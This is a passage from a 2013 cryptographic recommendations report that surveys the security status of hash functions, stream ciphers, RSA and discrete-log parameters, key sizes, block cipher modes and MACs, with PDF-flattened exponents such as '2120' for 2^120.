224 (resp. SHA-384) is a variant itself of SHA-256 (resp. SHA-512), but just uses a different IV
and then truncates the output. Due to our decision of symmetric security lengths of less than 128
being only suitable for legacy applications we denote SHA-224 as in the legacy only division of our
analysis.
Observation: For SHA-224/SHA-256 (resp. SHA-384/SHA-512) reduced round collision attacks
31 out of 64 (resp. 24 out of 80) have been reported [162, 239, 306]. In addition reduced round
variants 43 (resp. 46) have also been attacked for preimage resistance [22,138].
SHA-3
The competition organized by NIST to find an algorithm for SHA-3 ended on October 2nd, 2012,
with the selection of Keccak [131]. Currently, NIST is drafting a FIPS describing SHA-3.
Observation: Reduced round collision attacks (8 out of 24) have been reported [96].
Whirlpool
Whirlpool produces a 512-bit hash output and is not in the MD-X family; being built from AES
style methods, thus it is a good alternative to use to ensure algorithm diversity.
Observation: Preimage attacks on 5 (out of 10) rounds have been given [307], as well as collisions
on 5.5 rounds [210], with complexity 2120.
3.3.2 Legacy Hash Functions
RIPEMD-160
It is anticipated that collision attacks on RIPEMD-160 are likely to be found on reduced round
versions in the near future [240]. Collision attacks on 36 rounds (out of 80) have already been
found [238].
SHA-1
SHA-1 is in widespread use and was designed to provide protection against collision finding of 280.
However, the analysis of MD-5 has been extended to SHA-1 (which is in the same family), resulting
in collisions being found in 269operations [341], and even lower complexity [241,340]. The current
best analysis is that of 257.5operations, reported in [324]. On the other hand explicit collisions for
the full SHA-1 have not yet been found, despite collisions for a reduced round variant (73 rounds
Page: 26
Algorithms, Key Size and Parameters Report – 2013 Recommendations
out of 80) being found [102]. An extension of Stevens’ analysis from [324] is expected to yield a full
collision in 261operations.
Observation: The literature also contains preimage attacks on a variant reduced to 45-48 rounds
[23,69].
3.3.3 Historical (not recommended) Hash Functions
MD-5
Despite being widely deployed the MD-5 hash function should not be considered secure. Collisions
can be found within seconds on a modern desktop computer. The literature on the collision weakness
of MD-5 and its impact in various scenarios is wide [219, 309, 325–327]. Preimage resistance can
also be broken in time 2124.4[308].
RIPEMD-128
Given an output size of 128-bits, collisions can be found in RIPEMD-128 in time 264using generic
attacks, thus RIPEMD-128 can no longer be considered secure in a modern environment irrespective
of any cryptanalysis which reduces the overall complexity. Practical collisions for a 3-round variant
were reported in 2006, [240]. In [211] futher cryptanalytic results were presented which lead one to
conclude that RIPEMD-128 is not to be considered secure.
3.4 Stream Ciphers
Generally speaking stream ciphers should be used with a distinct IV for each message, unless
the key is used in a one-time manner (as for example in a DEM construction). Again, for each
cipher we give a short description of state of the art with respect to known attacks, we then give
recommendations for minimum parameter sizes for future and legacy use. For convenience these
recommendations are summarized in Table 3.4. Where possible, it is probably better to use a
block cipher in mode such as CTR mode than a dedicated stream cipher. Dedicated stream ciphers
offer performance advantages over AES in CTR mode, but historically the science of stream cipher
design lags that of block cipher and mode of operation design.
3.4.1 Recommended Stream Ciphers
Rabbit
Rabbit was an entrant to the eSTREAM competition and included in the final eSTREAM portfolio
as promising for software implementations. Rabbit uses a 128-bit key together with a 64-bit IV.
Rabbit is described in RFC 4503 and is included in ISO/IEC 18033-4 [167].
Page: 27
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Recommendation
Primitive Legacy Future
Rabbit ✓ ✓
SNOW 3G ✓ ✓
Trivium ✓ 
SNOW 2.0 ✓ 
A5/1  
A5/2  
E0  
RC4  
Table 3.4: Stream Cipher Summary
SNOW 3G
SNOW 3G is an enhanced version of SNOW 2.0, the main change being the addition of a second
S-Box as a protection against future advances in algebraic cryptanalysis. It uses a 128-bit key and
a 128-bit IV. The cipher is the core of the algorithms UEA2 and UIA2 of the 3GPP UMTS system,
which are identical to the algorithms 128-EIA1 and 128-EEA1 in LTE.
3.4.2 Legacy Stream Ciphers
Trivium
Trivium was an entrant to the eSTREAM competition and included in the final eSTREAM portfolio
as promising for hardware implementations. It has been included in ISO/IEC 29192-3 on lightweight
stream ciphers [169]. Trivium uses an 80-bit key together with an 80-bit IV.
Observation: There has been a number of papers on the cryptanalysis of Trivium and there
currently exists no attack against full Trivium. Aumasson et al. [25] present a distinguishing attack
with complexity 230on a variant of Trivium with the initialization phase reduced to 790 rounds
(out of 1152). Maximov and Biryukov [232] present a state recovery attack with time complexity
around 283.5. This attack shows that Trivium with keys longer than 80 bits provides no more
security than Trivium with an 80-bit key. It is an open problem to modify Trivium so as to obtain
128-bit security in the light of this attack.
SNOW 2.0
SNOW 2.0 comes in a 128 and 256-bit key variants. A distinguishing attack against SNOW 2.0 is
theoretically possible [268], but it requires 2174bits of key-stream and work. Given the introduction
Page: 28
Algorithms, Key Size and Parameters Report – 2013 Recommendations
of SNOW 3G we only see a legacy application for SNOW 2.0, and recommend all new systems
wishing to use a SNOW-like cipher to use SNOW 3G.
3.4.3 Historical (non recommended) Stream Ciphers
A5/1
A5/1 was originally designed for use in the GSM protocol. It is initialized using a 64-bit key and a
publicly known 22-bit frame number. The design of A5/1 was initially kept secret until 1994 when
the general design was leaked and has since been fully reverse engineered. The cipher has been
subject to a number of attacks. The best attack was shown to allow for real-time decryption of
GSM mobile phone conversations [27]. As result this cipher is notconsidered to be secure.
A5/2
A5/2 is a weakened version of A5/1 to allow for (historic) export restrictions to certain countries.
It is therefore notconsidered to be secure.
E0
The E0 stream cipher is used to encrypt data in Bluetooth systems. It uses a 128-bit key and no
IV. The best attack recovers the key using the first 24 bits of 224frames and 238computations [223].
This cipher is therefore notconsidered to be secure.
RC4
RC4 comes in various key sizes. Despite widespread deployment the RC4 cipher has for many years
been known to suffer from a number of weaknesses. There are various distinguishing attacks [226],
and state recovery attacks [233]. (An efficient technique to recover the secret key from an internal
state is described in [40].)
An important shortcoming of RC4 is that it was designed without an IV input. Some ap-
plications, notably WEP and WPA “fix” this by declaring some bytes of the key as IV, thereby
effectively enabling related-key attacks. This has led to key-recovery attacks on RC4 in WEP [337].
When initialized the first 512 output bytes of the cipher should be discarded due to statistical
biases. If this step is omitted, then key-recovery attacks can be accelerated, e.g. those on WEP
and WPA [317].
Despite statistical biases being known since 1995, SSL/TLS does not discard any of the output
bytes of RC4; this results in a recent attacks by AlFardan et al. [12] and Isobe et al. [163].
Page: 29
Algorithms, Key Size and Parameters Report – 2013 Recommendations
3.5 Public Key Primitives
For each primitive we give a short description of state of the art with respect to known attacks, we
then give recommendations for minimum parameter sizes for future and legacy use. For convenience
these recommendations are summarized in Table 3.5. In the table we let l(·) to denote the logarithm
to base two of a number; a ⋆denotes some conditions which also need to be tested which are
explained in the text.
Primitive Parameters Legacy System Minimum Future System Minimum
RSA Problem N, e, d l(n)≥1024, l(n)≥3072
e≥3 or 65537, d≥N1/2e≥3 or 65537, d≥N1/2
Finite Field DLP p, q, n l(pn)≥1024 l(pn)≥3072
l(p), l(q)>160 l(p), l(q)>256
ECDLP p, q, n l(q)≥160,⋆ l(q)>256,⋆
Pairing p, q, n, d, k l(pk·n)≥1024 l(pk·n)≥3072
l(p), l(q)>160 l(p), l(q)>256
Table 3.5: Public Key Summary
3.5.1 Factoring
Factoring is the underlying hard problem behind all schemes in the RSA family. In this section we
discuss what is known about the mathematical problem of factoring, we then specialize to the math-
ematical understanding of the RSA Problem. The RSA Problem is the underlying cryptographic
primitive, we are not considering the RSA encryption or signature algorithm at this point. In fact
vanilla RSA should never be used as an encryption or signature algorithm, the RSA primitive (i.e.
the RSA Problem) should only be used in combination with one of the well defined schemes from
Chapter 4.
Since the mid-1990s the state of the art in factoring numbers of general form has been determined
by the factorization of the RSA-challenge numbers. In the last decade this has progressed at the
following rate RSA-576 (2003) [124], RSA-640 (2005) [125], RSA-768 (2009) [202]. These records
have all been set with the Number Field Sieve algorithm [216]. It would seem prudent that only
legacy applications should use 1024 bit RSA modulus going forward, and that future systems should
use RSA keys with a minimum size of 3072 bits.
Since composite moduli for cryptography are usually chosen to be the product of two large
primes N=p·q, to ensure they are hard to factor it is important that pandqare chosen of the
same bit-length, but not too close together. In particular
•Ifl(p)≪l(q) then factoring can be made easier by using the small value of p(via the ECM
method [186]). Thus selecting pandqsuch that 0 .1<|l(p)−l(q)|≤20, is a good choice.
Page: 30
Algorithms, Key Size and Parameters Report – 2013 Recommendations
•On the other hand if |p−q|is less than N1/4then factoring can be accomplished by the
Coppersmith’s method [79].
Selecting pandqto be random primes of bit length l(N)/2 will, with overwhelming probably,
ensure that Nis hard to factor with both these techniques.
RSA Problem
Cryptosystems based on factoring are actually usually based not on the difficulty of factoring but
on the difficulty of solving the RSA problem. The RSA Problem is defined to be that of given an
RSA modulus N=p·q, an integer value esuch that gcd( e,(p−1)·(q−1)) = 1, and a value
y∈Z/NZfind the value x∈Z/NZsuch that xe=y(mod N).
Ifeis too small such a problem can be easily solved, assuming some side information, using
Coppersmith’s lattice based techniques [77, 78, 80]. Thus for RSA based encryption schemes it is
common to select e≥65537. For RSA based signature schemes such low values of edo not seem
to be a problem, thus it is common to select e≥3. For efficiency one often takes eto be as small
a prime as the above results would imply; thus it is very common to find choices of e= 65537 for
encryption and e= 3 for signatures in use.
The RSA private key is given by d= 1/e(mod ( p−1)·(q−1)). Some implementers may be
tempted to choose d“small” and then select eso as to optimize the private key operations. Clearly,
just from naive analysis dcannot be too small. However, lattice attacks can also be applied to
choices of dless than N0.292[57,343]. Lattice attacks in this area have also looked at situations in
which some of the secret key leaks in some way, see for example [116,150]. We therefore recommend
thatdis chosen such that d > N1/2, this will happen with overwhelming probability if the user
selects efirst and then finds d.
3.5.2 Discrete Logarithms
The discrete logarithm problem can be defined in any finite abelian group. The basic construction
is to take a finite abelian group of large prime order qgenerated by an element g. The discrete
logarithm problem is to recover x∈Z/qZfrom the value h=gx. It is common for the group
and generator to be used by a set of users; in this case the tuple {⟨g⟩, q}is called a set of Domain
Parameters .
Whilst the DLP is the underlying number theoretic problem in schemes based on the discrete
logarithm problem, actual cryptographic schemes base their security on (usually) one of three
related problems; this is similar to how factoring based schemes are usually based on the RSA
problem and not factoring per se. The three related problems are:
•Computational Diffie–Hellman problem: Given gxandgyfor hidden xandycompute gx·y.
•Decision Diffie–Hellman problem: Given gx,gyandgzfor hidden x, yandzdecide if z=x·y.
Page: 31
Algorithms, Key Size and Parameters Report – 2013 Recommendations
•Gap Diffie–Hellman problem: Given gxandgyfor hidden xandycompute gx·y, given an
oracle which allows solution of the Decision Diffie–Hellman problem.
Clearly the ability to solve the DLP will also give one the ability to solve the above three problems,
but the converse is not known to hold in general (although it is in many systems widely believed
to be the case).
Finite Field DLP
The discrete logarithm problem in finite fields (which we shall refer to simply as DLP), and hence
the Diffie–Hellman problem, Decision Diffie–Hellman problem and gap Diffie–Hellman problem, is
parametrized by the finite field Fpnand the subgroup size q, which should be prime. In particular
this means that qdivides pn−1. To avoid “generic attacks” the value qshould be at least 160 bits
in length for legacy applications and at least 256 bits in length for new deployments.
For the case of small prime characteristic, i.e. p= 2,3 there is new algorithm was presented
in early 2013 by Joux [184] which runs in time L(1/4 +o(1)), for when the extension degree n
is composite (which are of relevance to pairing based cryptography). This algorithm was quickly
supplanted by an algorithm which runs in quasi-polynomial time by Barbulescu and others [26].
Also in 2013 a series of record breaking calculations were performed by a French team and a Irish
team for characteristic two fields, resulting in the records of F26120[137] and F26168[182]. For
characteristic three the record is F3582[332]. For prime values of nthe best result is a discrete
logarithm calculation in the field F2809[61]. All of these results make use of special modification to
the function field sieve algorithm [9]. In light of these results no system should be deployed relying
on the hardness of the DLP in small characteristic fields.
For large prime fields, i.e. n= 1, the algorithm of choice is a variant of the Number Field
Sieve [135]. The record here is for a finite field Fpwith pa 530 bit prime [201] set in 2007. In light
of the “equivalence” between the number field sieve for factoring and that for discrete logarithms
our recommendation is in this case that legacy applications should use 1024 bit p, and new systems
should use a minimum pof 3072 bits.
There has been some work on the case of so called medium prime fields; fields with plarger than
100 and 1 < n < 100, see for example [183,185]. Currently these algorithms have no cryptographic
impact; although this might change if the fields being considered have impact on pairing based
cryptography (see Section 3.5.3). This is because all pairing based applications have log2(p)≥160.
ECDLP
Standard elliptic curve cryptography (i.e. ECC not using pairings) comes in two flavors, either
systems are based on elliptic curves over a large prime field E(Fp), or they are based on elliptic
curves over a field of characteristic two E(F2n). We denote the field size by pnin what follows, so
when writing pnwe implicitly assume either p= 2 or n= 1. We let qdenote the largest prime
Page: 32
Algorithms, Key Size and Parameters Report – 2013 Recommendations
factor of the group order and let hdenote the “cofactor”, so h·q= #E(Fpn). To avoid known
attacks one selects these parameters so that
•The smallest tsuch that qdivides pt·n−1 is such that extracting discrete logarithms in the
finite field of size pt·nis hard. This is the so called MOV condition [242].
•Ifn= 1 then we should not have p=q. These are the so-called anomalous curves for which
there is a polynomial time attack [310,316,321].
•Ifp= 2 then nshould be prime. This is to avoid so-called Weil descent attacks [132].
It is common, to avoid small subgroup attacks, for the curve to be chosen such that h= 1 in the
case of n= 1 and h= 2 or 4 in the case of p= 2. There are a subclass of curves called Koblitz
curves in the case of p= 2 which offer some performance advantages, but we do not consider the
benefit to outweigh the cost for modern processors thus our discussion focuses on general curves
only. Some standards, e.g. [117] stipulate that the class number of the associated endomorphism
ring must be larger than some constant (e.g. 200). We see no cryptographic reason for making this
recommendation; since by choosing random curves it is over whelmingly likely to occur in any case
and no weakness is known for such curves.
The largest ECDLP records have been set for the case of n= 1 with a pof size 109-bits [60],
and for p= 2 with n= 109 [72]. These record setting achievements are all performed with the
method of distinguished points [333], which is itself based on Pollard’s rho method [285]. To avoid
such “generic attacks” the value qshould be at least 160 bits in length for legacy applications and
at least 256 bits in length for new deployments.
Various standards, e.g. [19, 20, 315] specify a set of recommended curves; many of which also
occur in other standards and specifications, e.g. in TLS [50]. Due to issues of interoperability the
authors feel that using a curve specified in a standard is best practice. Thus the main choice for
an implementer is between curves in characteristic two and large prime characteristic.
3.5.3 Pairings
Pairing based systems take two elliptic curves E(Fpn) and ˆE(Fpn·d), each containing a subgroup of
order q. We denote the subgroup of order qin each of these elliptic curves by G1andG2. Pairing
based systems also utilize a finite field Fpk·n, where qdivides pk·n−1. These three structures are
linked via a bilinear mapping ˆt:G1×G2−→GT, where GTis the multiplicative subgroup of Fpk·n
of order q. The value kis called the embedding degree, and we always have 1 ≤d≤k. Whilst there
are many hard problems on which pairing based cryptography is based, the most efficient attack is
almost always the extraction of discrete logarithms in either one of the elliptic curves or the finite
field (although care needs to be taken with some schemes due to the additional information the
scheme makes available). Given our previous discussion on the finite field DLP and the ECDLP the
parameter choices for legacy and new systems are immediate. Note: This immediately implies that
log2(p)>160, so as to avoid attacks based on the low characteristic discrete logarithm algorithms
Page: 33
Algorithms, Key Size and Parameters Report – 2013 Recommendations
in finite fields. In addition, note that the conditions in Table 3.5 immediately imply all the special
conditions for elliptic curve based systems indicated by a ⋆in the ECDLP row.
3.6 Recommendations
Recommending key sizes for long term use is somewhat of a hit-and-miss affair, for a start it
assumes that the algorithm you are selecting a key size for is not broken in the mean time. So
in recommending key sizes for specific application domains we make an implicit assumption that
the primitive, scheme or protocol which utilizes this key size is not broken in the near future.
All primitives, protocols and schemes marked as suitable for future use in this document we have
confidence will remain secure for a significant period of time.
Making this assumption still implies a degree of choice as to key size however. The AES block
cipher may remain secure for the next fifty years, but one is likely to want to use a larger key
size for data which one wishes to secure for fifty years as opposed to, say, five years. Thus in
recommending key sizes we make two distinct cases for schemes relevant for future use. The first
cases is for security which you want to ensure for at least ten years (which we call near term ), and
secondly for security for thirty to fifty years (which we call long term ). Again we reiterate these
are purely key size recommendations and they do not guarantee security, nor do they guarantee
against attacks on the underlying mathematical primitives.
In Table 3.6 we present our explicit key size recommendations. The reader will see that we have
essentially followed the NIST equivalence [265] between the different key sizes. However, these key
sizes equivalences need to be understood to apply only to the “best in class” algorithm for block
ciphers, hash function, RSA parameters, etc etc. It is clearly possible for a block cipher of 128-bits
security to not offer 128-bit security due to cryptanalytic attacks.
We have focused on 128 bit security in this document for future use recommendations; clearly
this offers a good long term security gaurantee. It is plausible that a similar recommendation could
be made at (say) the 112 bit security level (which would correspond to roughly 2048 bit RSA keys).
The line has to be drawn somewhere and there is general agreement this should be above the 100-bit
level; whether one selects 112 bits or 128 bits as the correct level is a matter of taste. Due to the
need to protect long term data we have taken the conservative choice and settled on 128 bits; with
a higher level for very long term use.
Due to the problem of key sizes not being a good measure of security on their own, and also
due to considerations of underlying performance costs, at the time of writing the recommendation
for future use can be summarized in the following simple choices:
1. Block Ciphers: For near term use we recommend AES-128 and for long term use AES-256.
2. Hash Functions: For near term use we recommend SHA-256 and for long term use SHA-512.
3. Public Key Primitive: For near term use we recommend 256 bit elliptic curves, and for long
term use 512 bit elliptic curves.
Page: 34
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Future System Use
Parameter Legacy Near Term Long Term
Symmetric Key Size k 80 128 256
Hash Function Output Size m 160 256 512
MAC Output Size m 80 128 256⋆
RSA Problem l(n)≥ 1024 3072 15360
Finite Field DLP l(pn)≥ 1024 3072 15360
l(p), l(q)≥ 160 256 512
ECDLP l(q)≥ 160 256 512
Pairing l(pk·n)≥ 1024 3072 15360
l(p), l(q)≥ 160 256 512
Table 3.6: Key Size Recommendations. A⋆notes the value could be smaller due to specific protocol
or system reasons, the value given is for general purposes.
Finally, we note that the recommendations above, and indeed all analysis in this document, is on
the basis that there is no breakthrough in the construction of quantum computers.
Page: 35
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Chapter 4
Schemes
As mentioned previous a cryptographic scheme usually comes with an associated security proof.
This is (most often) an algorithm which takes an adversary against the scheme in some well defined
model, and turns the adversary into one which breaks some property of the underlying primitive (or
primitives) out of which the scheme is constructed. If one then believes the primitive to be secure,
one then has a strong guarantee that the scheme is well designed. Of course other weaknesses may
exist, but the security proof validates the basic design of the scheme. In modern cryptography all
schemes should come with a security proof.
The above clean explanation however comes with some caveats. In theoretical cryptography a
big distinction is made between schemes which have proofs in the standard model of computation,
and those which have proofs in the random oracle model . The random oracle model is a model
in which hash functions are assumed to be idealized objects. A similar issue occurs with some
proofs using idealized groups (the so-called generic group model ), or idealized ciphers (a.k.a the
ideal cipher model ). In this document we take, as do most cryptographers working with real world
systems, the pragmatic view; that a scheme with a proof in the random oracle model is better than
one with no proof, and that the use of random oracles etc can be justified if they produce schemes
which have performance advantages over schemes which have proofs in the standard model.
It is sometimes tempting for an implementer to use the same key for different purposes. For
example to use a symmetric AES key as both the key to an application of AES in an encryption
scheme, and also for the use of AES within a MAC scheme, or within different modes of operation
[134]. As another example one can imagine using an RSA private key as both an decryption key
and as a key to generate RSA signatures; indeed this latter use-case is permitted in the EMV chip-
and-pin system [90]. Another example would be to use the same encryption key on a symmetric
channel between Alice and Bob for two way communication, i.e. using has one bidirectional key
as opposed to two unidirectional keys. Such usage can often lead to unexpected system behaviour,
thus it is good security practice to design into systems explicit key separation .
Key separation means we can isolate the systems dependence on each key and its usages; and
Page: 36
Algorithms, Key Size and Parameters Report – 2013 Recommendations
indeed many security proofs implicitly assume that key separation is being deployed. However, in
some specific instances one can show, for specific pairs of cryptographic schemes, that key separation
is not necessary. We do not discuss this further in this document but refer the reader to [15,90,274],
and simply warn the reader to violate the key separation principle with caution.
In Tables 4.1, 4.2, 4.3 and 4.4 we present our summary of the various symmetric and asymmetric
schemes considered in this document. In each scheme we assume the parameters and building blocks
have been chosen so that the recommendations of Chapter 3 apply.
In 4.1 we give (some of) the security notions for symmetric encryption achieved by the the
various constructions presented in Sections 4.1 and 4.3. Whether it is suitable for future or legacy
use needs to be decided by consideration of the underlying block cipher and therefore by reference
to Table 3.2. For general encryption of data we strongly recommend the use of an authenticated
encryption scheme, and CCM, EAX or GCM modes in particular. The columns IND-CPA, IND-
CCA and IND-CVA refer to indistinguishablity under chosen plaintext, chosen ciphertext and
ciphertext validity attacks. The latter class of attacks lie somewhere between IND-CPA and IND-
CCA and include padding oracle attacks. Of course some of the padding oracle attacks imply
a specific choice as to how padding is performed in such schemes. In our table a scheme which
does not meet IND-CVA does not meet IND-CVA for a specific padding method. Similarly an
authenticated encryption scheme which does not meet IND-CCA is one which does not meet this
goal for a specific choice of underlying components.
4.1 Block Cipher Basic Modes of Operation
In this section we detail the main modes of operation for using a block cipher as a symmetric en-
cryption scheme. Note, we leave a discussion of schemes which are secure against chosen-ciphertext
attacks until Section 4.3; thus this section is essentially about IND-CPA schemes only. As such
allschemes in this section need to be used with extreme care in an application. Further technical
discussion and comparison on the majority of modes stated here can be found in [297].
4.1.1 ECB
Electronic Code Book (ECB) mode [258] should be used with care. It should only be used to
encrypt messages with length at most that of the underlying block size, and only for keys which
are used in a one-time manner. This is because without such guarantees ECB mode provides no
modern notion of security.
4.1.2 CBC
Cipher Block Chaining (CBC) mode [258] is the most widely used mode of operation. Unless used
with a one-time key, an independent and random IV must be used for each message; with such a
usage the mode can be shown to be IND-CPA secure [30], if the underlying block cipher is secure.
Page: 37
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Scheme IND-CPA IND-CVA IND-CCA Notes
Block Cipher Modes of Operation
OFB ✓ (✓)  No padding
CFB ✓ (✓)  No padding
CTR ✓ (✓)  No padding
CBC ✓  
ECB    See text
XTS - -  See text
EME - -  See text
Authenticated Encryption
Encrypt-then-MAC ✓ ✓ ✓ Assuming secure Encrypt/MAC used
OCB ✓ ✓ ✓
CCM ✓ ✓ ✓ Superseded by EAX
EAX ✓ ✓ ✓
CWC ✓ ✓ ✓
GCM ✓ ✓ ✓
MAC-then-Encrypt ✓   See Encrypt-then-MAC text
Encrypt-and-MAC ✓   See Encrypt-then-MAC text
Table 4.1: Symmetric Key Encryption Summary Table
Recommendation
Scheme Legacy Future Building Block
EMAC ✓ ✓ Any block cipher as a PRP
CMAC ✓ ✓ Any block cipher as a PRP
HMAC ✓ ✓ Any hash function as a PRF
UMAC ✓ ✓ An internal universal hash function
GMAC ✓  Finite field operations
AMAC ✓  Any block cipher
Table 4.2: Symmetric Key Based Authentication Summary Table
The mode is not IND-CCA secure as ciphertext integrity is not ensured, for applications requir-
ing IND-CCA security an authenticated encryption mode is to be used (for example by applying a
message authentication code to the output of CBC encryption). For further details see Section 4.3.
Since CBC mode requires padding of the underlying message before encryption the mode suffers
from certain padding oracle attacks [276, 335, 346]. Again usage of CBC within an authenticated
encryption scheme (and uniform error reporting) can mitigate against such attacks.
Page: 38
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Recommendation
Primitive Legacy Future Building Block
NIST-800-108-KDF(all modes) ✓ ✓ A PRF (e.g. a MAC)
X9.63-KDF ✓ ✓ Any hash function
NIST-800-56-KDF-A/B ✓ ✓ Any hash function
NIST-800-56-KDF-C ✓ ✓ A MAC function
IKE-v2-KDF ✓ ✓ HMAC used as a PRF
TLS-v1.2-KDF ✓ ✓ HMAC (SHA-2) as a PRF
IKE-v1-KDF ✓  HMAC used as a PRF
TLS-v1.1-KDF ✓  HMAC (MD-5 and SHA-1) used as a PRF
Table 4.3: Key Derivation Function Summary Table
4.1.3 OFB
Output Feedback (OFB) mode [258] produces a stream cipher from a block cipher primitive, using
an IV as the initial input to the block cipher and then feeding the resulting output back into the
blockcipher to create a stream of blocks. To improve efficiency the stream can be precomputed.
The mode is IND-CPA secure when the IV is random (this follows from the security result for
CBC mode). If the IV is a nonce then IND-CPA security is not satisfied. The mode is not IND-
CCA secure as ciphertext integrity is not ensured, for applications requiring IND-CCA security an
authenticated encryption mode is to be used (cf. Section 4.3). OFB mode does not require padding
so does not suffer from padding oracle attacks.
4.1.4 CFB
Cipher Feedback (CFB) mode [258] produces a self-synchronising stream cipher from a block cipher.
Unless used with a one-time key the use of an independent and random IV must be used for each
message; with such a usage the mode can be shown to be IND-CPA secure [14], if the underlying
block cipher is secure.
The mode is not IND-CCA secure as ciphertext integrity is not ensured. For applications
requiring IND-CCA security an authenticated encryption mode is to be used (cf. Section 4.3).
CFB mode does not require padding so does not suffer from padding oracle attacks.
4.1.5 CTR
Counter (CTR) mode [258] produces a stream cipher from a block cipher primitive, using a counter
as the input message to the block cipher and then taking the resulting output as the stream cipher
sequence. The counter (or IV) should be a nonce to achieve IND-CPA security [30]. The scheme is
rendered insecure if the counter is repeated.
Page: 39
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Recommendation
Scheme Legacy Future Notes
Public Key Encryption/Key Encapsulation
RSA-OAEP ✓ ✓ See text
RSA-KEM ✓ ✓ See text
PSEC-KEM ✓ ✓ See text
ECIES-KEM ✓ ✓ See text
RSA-PKCS# 1 v1.5   Should only be used in special situations
Public Key Signature Schemes
RSA-PSS ✓ ✓ See text
ISO-9796-2 RSA-DS2 ✓ ✓ Message recovery variant of RSA-PSS
PV Signatures ✓ ✓ ISO 14888-3 only defines these for a finite field
(EC)Schnorr ✓ ✓ See text
RSA-PKCS# 1 v1.5 ✓  No security proof
RSA-FDH ✓  Issues in instantiating the required hash function
ISO-9796-2 RSA-DS3 ✓  Similar to RSA-FDH
(EC)DSA,(EC)GDSA ✓  Weak provable security guarantees
(EC)KDSA,(EC)RDSA ✓  Weak provable security guarantees
ISO-9796-2 RSA-DS1   Attack exists (see notes)
Identity Based Encryption
BB ✓ ✓ See text
SK ✓ ✓ See text
BF ✓  See text
Table 4.4: Public Key Based Scheme Summary Table
The mode is not IND-CCA secure as ciphertext integrity is not ensured, for applications re-
quiring IND-CCA security an authenticated encryption mode is to be used (cf. Section 4.3). No
padding is necessary so the mode does not suffer from padding oracle attacks.
Unlike all previous modes mention, CTR mode is easily and fully parallelisable allowing for
much faster encryption and decryption.
We recommend this mode above all others when privacy-only encryption is required.
4.1.6 XTS
XTS mode [261] is short for XEX Tweakable Block Cipher with Ciphertext Stealing and is based on
the XEX tweakable block cipher [296] (using two keys instead of one). The mode was specifically
designed for encrypted data storage using fixed-length data units, and is used in the TrueCrypt
system.
Page: 40
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Due to the specific application of disc encryption the standard notion of IND-CPA security is
not appropriate for this setting. It is mentioned in [261] that the mode should provide slightly more
protection against data manipulation than standard confidentiality-only modes. The exact notion
remains unclear and as a result XTS mode does not have a proof of security. Further technical
discussion on this matter can be found in [297, Chapter 6] and [222]. The underlying tweakable
block cipher XEX is proved secure as a strong pseudorandom permutation [296].
Due to its “narrow-block” design XTS mode offers significant efficiency benefits over “wide-
block” schemes.
4.1.7 EME
ECB-mask-ECB (EME) mode was designed by Halevi and Rogaway [141] and has been improved
further by Halevi [139]. EME mode is design for the encrypted data storage setting and is proved
secure as a strong tweakable pseudorandom permutation. Due to its wide block design it will be
half the speed of XTS mode but in return does offer greater security. EME is patented and its use
is therefore restricted.
4.2 Message Authentication Codes
Message Authentication Codes (MAC) are symmetric-key cryptosystems that aim to achieve mes-
sage integrity. Most commonly used designs fall in one of two categories: block-cipher based schemes
(detailed in Section 4.2.1), and hash function based schemes (Sections 4.2.3).
4.2.1 Block Cipher Based MACs
Almost all block cipher based MACs are based on CBC-MAC. The essential differences in ap-
plication arise due to the padding method employed, how the final iteration is performed and the
post-processing method needed to produce the final output. The final iteration and post-processing
methods impact on the number of keys required by the MAC function. The ISO 9797-1 stan-
dard [171] defines four padding methods, three final iteration methods and three post-processing
methods, and from these it defines six CBC-MAC algorithms which can be utilized with any cipher;
one of which uses a non-standard processing of the first block. In summary of these six algorithms
we have, where Hqis the output of the final iteration, Hq−1is the output of the penultimate
iteration, Diis the ipadded message block, and Kis the block cipher key used for iterations
1, . . . , q−1,
Page: 41
Algorithms, Key Size and Parameters Report – 2013 Recommendations
ISO 9797-1 First Final Post
Number Iteration Iteration Processing a.k.a
1 H1=EK(D1) Hq=EK(Dq⊕Hq−1) G=Hq CBC-MAC
2 H1=EK(D1) Hq=EK(Dq⊕Hq−1) G=EK′(Hq) EMAC
3 H1=EK(D1) Hq=EK(Dq⊕Hq−1) G=EK(DK′(Hq)) AMAC
4 H1=EK′′(EK(D1)) Hq=EK(Dq⊕Hq−1) G=EK′(Hq) -
5 H1=EK(D1) Hq=EK(Dq⊕Hq−1⊕K′) G=Hq CMAC
6 H1=EK(D1) Hq=EK′(Dq⊕Hq−1) G=Hq LMAC
Of these we only focus on EMAC, AMAC and CMAC, being the most utilized, of these we do not
recommend AMAC for other than legacy use (since EMAC and CMAC are easily used instead, and
offer stronger guarantees), and vanilla CBC-MAC is on its own not considered secure. Of course all
MACs should be used with keysizes and output sizes which match our key size recommendations.
In particular this means for high security levels, i.e. equivalent to 256-bits of AES security, these
MAC functions cannot be used with AES as there output lengths are limited to the block length
of the underlying block cipher. Unless the application allows shorter MAC values for some reason.
EMAC
The Algorithm was introduced in [279] and is specified as Algorithm 2 in ISO-9797-1 [171]. Provable
security guarantees have been derived in [279,280]. Note that the guarantees are for the version of
the scheme that uses two independent keys; there are no known guarantees for the version where
the two keys are derived from a single key in the way specified by the standard. The function
LMAC obtains the same security bounds as EMAC but uses one fewer encryption operation.
AMAC
The algorithm was introduced in [16] and is also specified as Algorithm 3 in ISO 9797-1 [171]. The
algorithm is known as ANSI Retail MAC, or just AMAC for short, and is deployed in banking
applications with DES as the underlying block cipher. There are known attacks against the scheme
that require 2n/2MAC operations, where nis the block size. The scheme should therefore not be
used, unless frequent rekeying is employed.
CMAC
The CMAC scheme was introduced in [173] and standardized as Algorithm 5 in [171]. It enjoys
provable security guarantees under the assumption that the underlying block-cipher is a PRP [250].
In particular this requires frequent rekeying; for example when instantiated with AES-128 existing
standards recommend that the scheme should be used for at most 248messages. Furthermore, the
scheme should only be used in applications where no party learns the enciphering of the all-0 string
under the block-cipher underlying the MAC scheme.
Page: 42
Algorithms, Key Size and Parameters Report – 2013 Recommendations
4.2.2 GMAC
GMAC is the MAC function underlying the authenticated encryption mode GCM. It makes use of
polynomials over the finite field GF(2128), and evaluates a message dependent function at a fixed
value. This can lead to some weaknesses, indeed in uses of SNOW 3G in LTE the fixed value is
alterred at each invocation in a highly similar construction. Without this fix, there is a growing
